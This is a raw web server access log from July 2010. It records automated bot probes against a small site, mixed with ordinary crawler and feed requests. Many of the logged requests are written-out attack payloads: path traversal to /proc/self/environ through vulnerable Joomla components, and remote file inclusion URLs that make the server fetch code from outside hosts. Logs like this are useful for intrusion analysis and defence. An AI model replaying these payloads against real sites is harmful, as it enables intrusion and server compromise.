174.121.58.85 - - [22/Jul/2010:04:14:23 -0700] "GET /logs/?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.831" "www.redneckmba.com"
66.249.65.108 - - [22/Jul/2010:04:14:27 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "redneckmba.com"
89.97.199.132 - - [22/Jul/2010:04:14:45 -0700] "GET /logs/access.log/?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.69" "www.redneckmba.com"
89.97.199.132 - - [22/Jul/2010:04:14:34 -0700] "GET /?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.69" "www.redneckmba.com"
89.97.199.132 - - [22/Jul/2010:04:14:34 -0700] "GET /logs/?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.69" "www.redneckmba.com"
77.246.248.221 - - [22/Jul/2010:04:16:21 -0700] "GET /logs/access.log//?_PHPLIB[libdir]=http://www.sunset.alfaspace.net//temp/idasc.txt??????? HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.redneckmba.com"
77.246.248.221 - - [22/Jul/2010:04:16:22 -0700] "GET /?_PHPLIB[libdir]=http://www.sunset.alfaspace.net//temp/idasc.txt??????? HTTP/1.1" 200 779 "-" "libwww-perl/5.823" "www.redneckmba.com"
77.246.248.221 - - [22/Jul/2010:04:16:22 -0700] "GET /logs//?_PHPLIB[libdir]=http://www.sunset.alfaspace.net//temp/idasc.txt??????? HTTP/1.1" 200 1944 "-" "libwww-perl/5.823" "www.redneckmba.com"
76.13.114.107 - - [22/Jul/2010:04:33:31 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.123.195 - - [22/Jul/2010:04:46:00 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
77.246.248.221 - - [22/Jul/2010:04:51:17 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.sunset.alfaspace.net//temp/idasc.txt??????? HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.redneckmba.com"
77.246.248.221 - - [22/Jul/2010:04:51:17 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.sunset.alfaspace.net//temp/idasc.txt??????? HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.redneckmba.com"
66.163.171.207 - - [22/Jul/2010:05:01:43 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
195.228.45.188 - - [22/Jul/2010:05:10:23 -0700] "GET /logs///delete_all.php?board_skin_path=http://www.eroticnorthamerica.com/new//admin/classes/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.redneckmba.com"
195.228.45.188 - - [22/Jul/2010:05:10:23 -0700] "GET //delete_all.php?board_skin_path=http://www.eroticnorthamerica.com/new//admin/classes/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.redneckmba.com"
76.13.114.105 - - [22/Jul/2010:05:12:45 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
67.218.116.168 - - [22/Jul/2010:05:23:39 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.redneckmba.com"
93.85.164.200 - - [22/Jul/2010:05:39:24 -0700] "GET /logs/index.php HTTP/1.1" 404 - "http://www.redneckmba.com/logs/index.php" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.redneckmba.com"
76.13.123.194 - - [22/Jul/2010:05:44:08 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
89.108.64.192 - - [22/Jul/2010:05:49:17 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.redneckmba.com"
71.71.54.208 - - [22/Jul/2010:05:49:47 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&http://www.miranda.gov.ve/Weborb/Protocols/chelly.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.redneckmba.com"
89.108.64.192 - - [22/Jul/2010:05:50:25 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.redneckmba.com"
89.108.64.192 - - [22/Jul/2010:05:50:32 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.redneckmba.com"
89.108.64.192 - - [22/Jul/2010:05:50:32 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.redneckmba.com"
89.108.64.192 - - [22/Jul/2010:05:50:32 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.redneckmba.com"
66.163.171.205 - - [22/Jul/2010:05:52:32 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.105 - - [22/Jul/2010:05:53:18 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
71.71.54.208 - - [22/Jul/2010:06:00:55 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&http://www.miranda.gov.ve/Weborb/Protocols/chelly.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.redneckmba.com"
71.71.54.208 - - [22/Jul/2010:06:00:56 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&http://www.miranda.gov.ve/Weborb/Protocols/chelly.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.redneckmba.com"
71.71.54.208 - - [22/Jul/2010:06:00:56 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&http://www.miranda.gov.ve/Weborb/Protocols/chelly.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.redneckmba.com"
89.108.64.192 - - [22/Jul/2010:06:02:59 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.redneckmba.com"
89.108.64.192 - - [22/Jul/2010:06:02:59 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.redneckmba.com"
89.108.64.192 - - [22/Jul/2010:06:03:00 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.redneckmba.com"
216.227.214.212 - - [22/Jul/2010:06:07:21 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
89.108.64.192 - - [22/Jul/2010:06:08:56 -0700] "GET /logs/access_100614.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.redneckmba.com"
89.108.64.192 - - [22/Jul/2010:06:16:23 -0700] "GET /logs/access_100607.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "redneckmba.com"
89.108.64.192 - - [22/Jul/2010:06:16:24 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "redneckmba.com"
89.108.64.192 - - [22/Jul/2010:06:16:24 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "redneckmba.com"
216.227.214.212 - - [22/Jul/2010:06:25:15 -0700] "GET /logs/access_100607.log/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
216.227.214.212 - - [22/Jul/2010:06:25:15 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
216.227.214.212 - - [22/Jul/2010:06:25:16 -0700] "GET /logs/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
76.13.114.106 - - [22/Jul/2010:06:36:42 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.123.194 - - [22/Jul/2010:06:44:00 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.163.171.207 - - [22/Jul/2010:06:45:08 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
89.200.170.145 - - [22/Jul/2010:06:57:54 -0700] "GET /?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.813" "www.redneckmba.com"
89.200.170.145 - - [22/Jul/2010:06:58:13 -0700] "GET /?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.813" "www.redneckmba.com"
174.121.58.89 - - [22/Jul/2010:06:58:40 -0700] "GET /?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.redneckmba.com"
188.127.248.175 - - [22/Jul/2010:06:58:58 -0700] "GET /?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.808" "www.redneckmba.com"
89.200.170.145 - - [22/Jul/2010:06:59:02 -0700] "GET /?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.813" "www.redneckmba.com"
174.121.58.89 - - [22/Jul/2010:06:59:26 -0700] "GET /?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.redneckmba.com"
188.127.248.175 - - [22/Jul/2010:07:00:03 -0700] "GET /?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.808" "www.redneckmba.com"
188.127.248.175 - - [22/Jul/2010:07:00:04 -0700] "GET /logs/?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.808" "www.redneckmba.com"
188.127.248.175 - - [22/Jul/2010:07:00:04 -0700] "GET /?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.808" "www.redneckmba.com"
174.121.58.85 - - [22/Jul/2010:07:00:07 -0700] "GET /?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.831" "www.redneckmba.com"
89.200.170.145 - - [22/Jul/2010:07:03:25 -0700] "GET /logs/access.log/?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
89.200.170.145 - - [22/Jul/2010:07:03:25 -0700] "GET /?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.813" "www.redneckmba.com"
89.200.170.145 - - [22/Jul/2010:07:03:25 -0700] "GET /logs/?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.813" "www.redneckmba.com"
89.200.170.145 - - [22/Jul/2010:07:03:39 -0700] "GET /logs/access.log/?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
89.200.170.145 - - [22/Jul/2010:07:03:39 -0700] "GET /?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.813" "www.redneckmba.com"
89.200.170.145 - - [22/Jul/2010:07:03:39 -0700] "GET /logs/?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.813" "www.redneckmba.com"
89.108.64.192 - - [22/Jul/2010:07:04:08 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.redneckmba.com"
89.108.64.192 - - [22/Jul/2010:07:04:08 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.redneckmba.com"
89.108.64.192 - - [22/Jul/2010:07:04:08 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.redneckmba.com"
174.121.58.85 - - [22/Jul/2010:07:05:09 -0700] "GET /logs/access.log/?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
174.121.58.85 - - [22/Jul/2010:07:05:09 -0700] "GET /?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.831" "www.redneckmba.com"
174.121.58.85 - - [22/Jul/2010:07:05:09 -0700] "GET /logs/?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.831" "www.redneckmba.com"
188.127.248.175 - - [22/Jul/2010:07:06:30 -0700] "GET /logs/access.log/?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
188.127.248.175 - - [22/Jul/2010:07:06:30 -0700] "GET /?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.808" "www.redneckmba.com"
188.127.248.175 - - [22/Jul/2010:07:06:31 -0700] "GET /logs/?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.808" "www.redneckmba.com"
89.200.170.145 - - [22/Jul/2010:07:11:32 -0700] "GET /logs/access.log/?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
89.200.170.145 - - [22/Jul/2010:07:11:21 -0700] "GET /?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.813" "www.redneckmba.com"
89.200.170.145 - - [22/Jul/2010:07:11:22 -0700] "GET /logs/?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.813" "www.redneckmba.com"
188.127.248.175 - - [22/Jul/2010:07:11:29 -0700] "GET /logs/access.log/?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
188.127.248.175 - - [22/Jul/2010:07:11:29 -0700] "GET /?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.808" "www.redneckmba.com"
188.127.248.175 - - [22/Jul/2010:07:11:29 -0700] "GET /logs/?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.808" "www.redneckmba.com"
76.13.114.107 - - [22/Jul/2010:07:23:39 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
87.98.217.83 - - [22/Jul/2010:07:39:51 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://BYE515.fileave.com/rfiid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
87.98.217.83 - - [22/Jul/2010:07:39:51 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://BYE515.fileave.com/rfiid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
66.163.171.205 - - [22/Jul/2010:07:41:42 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.123.194 - - [22/Jul/2010:07:47:28 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
87.98.217.83 - - [22/Jul/2010:07:56:37 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://BYE515.fileave.com/rfiid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
87.98.217.83 - - [22/Jul/2010:07:56:37 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://BYE515.fileave.com/rfiid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
87.98.217.83 - - [22/Jul/2010:07:56:37 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://BYE515.fileave.com/rfiid.txt? HTTP/1.0" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
87.98.217.83 - - [22/Jul/2010:07:56:41 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://BYE515.fileave.com/rfiid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
87.98.217.83 - - [22/Jul/2010:07:56:41 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://BYE515.fileave.com/rfiid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
87.98.217.83 - - [22/Jul/2010:07:56:41 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://BYE515.fileave.com/rfiid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
76.13.114.107 - - [22/Jul/2010:08:14:09 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
67.195.114.41 - - [22/Jul/2010:08:18:33 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.redneckmba.com"
67.195.114.41 - - [22/Jul/2010:08:18:46 -0700] "GET /logs/scripts.log HTTP/1.0" 200 1456218 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.redneckmba.com"
88.131.106.8 - - [22/Jul/2010:08:27:13 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.redneckmba.com"
88.131.106.1 - - [22/Jul/2010:08:27:14 -0700] "GET /logs/?D=A HTTP/1.0" 200 1923 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.redneckmba.com"
66.163.171.206 - - [22/Jul/2010:08:44:28 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
81.208.34.38 - - [22/Jul/2010:08:52:26 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.babyshop.ru///ban/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
81.208.34.38 - - [22/Jul/2010:08:52:27 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.babyshop.ru///ban/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
76.13.123.194 - - [22/Jul/2010:08:53:45 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
64.182.124.219 - - [22/Jul/2010:08:56:09 -0700] "GET /blog/ HTTP/1.1" 404 - "http://find1friend.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.redneckmba.com"
81.208.34.38 - - [22/Jul/2010:09:07:51 -0700] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.babyshop.ru///ban/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
81.208.34.38 - - [22/Jul/2010:09:07:52 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.babyshop.ru///ban/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
81.208.34.38 - - [22/Jul/2010:09:07:53 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.babyshop.ru///ban/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
94.143.220.3 - - [22/Jul/2010:09:07:57 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.redneckmba.com"
94.143.220.3 - - [22/Jul/2010:09:07:57 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.redneckmba.com"
94.143.220.3 - - [22/Jul/2010:09:08:05 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.redneckmba.com"
174.121.58.89 - - [22/Jul/2010:09:09:48 -0700] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.redneckmba.com"
76.13.114.107 - - [22/Jul/2010:09:10:15 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
174.121.58.89 - - [22/Jul/2010:09:10:54 -0700] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.redneckmba.com"
174.121.58.89 - - [22/Jul/2010:09:15:12 -0700] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.redneckmba.com"
174.121.58.89 - - [22/Jul/2010:09:16:08 -0700] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.redneckmba.com"
174.121.58.89 - - [22/Jul/2010:09:17:14 -0700] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "redneckmba.com"
174.121.58.89 - - [22/Jul/2010:09:17:15 -0700] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.redneckmba.com"
174.121.58.89 - - [22/Jul/2010:09:17:56 -0700] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "redneckmba.com"
222.236.47.182 - - [22/Jul/2010:09:27:29 -0700] "GET /logs//skin/ggambo7002_board/comment_modify.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
222.236.47.182 - - [22/Jul/2010:09:27:29 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
222.236.47.182 - - [22/Jul/2010:09:27:31 -0700] "GET /logs/access.log%20%20//skin/ggambo7002_board/comment_modify.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
222.236.47.182 - - [22/Jul/2010:09:28:20 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
222.236.47.182 - - [22/Jul/2010:09:28:20 -0700] "GET /logs//skin/ggambo7002_board/comment_modify.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
222.236.47.182 - - [22/Jul/2010:09:28:21 -0700] "GET /logs/access.log%20%20//skin/ggambo7002_board/comment_modify.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
94.143.220.3 - - [22/Jul/2010:09:41:12 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.redneckmba.com"
94.143.220.3 - - [22/Jul/2010:09:41:12 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.redneckmba.com"
94.143.220.3 - - [22/Jul/2010:09:41:13 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.redneckmba.com"
94.143.220.3 - - [22/Jul/2010:09:41:13 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.redneckmba.com"
94.143.220.3 - - [22/Jul/2010:09:41:14 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.redneckmba.com"
94.143.220.3 - - [22/Jul/2010:09:41:14 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.redneckmba.com"
66.163.171.205 - - [22/Jul/2010:09:44:54 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.123.194 - - [22/Jul/2010:09:54:36 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
94.143.220.3 - - [22/Jul/2010:09:55:41 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.redneckmba.com"
94.143.220.3 - - [22/Jul/2010:09:55:42 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.redneckmba.com"
94.143.220.3 - - [22/Jul/2010:09:55:42 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.redneckmba.com"
94.143.220.3 - - [22/Jul/2010:09:55:42 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.redneckmba.com"
94.143.220.3 - - [22/Jul/2010:09:55:42 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.redneckmba.com"
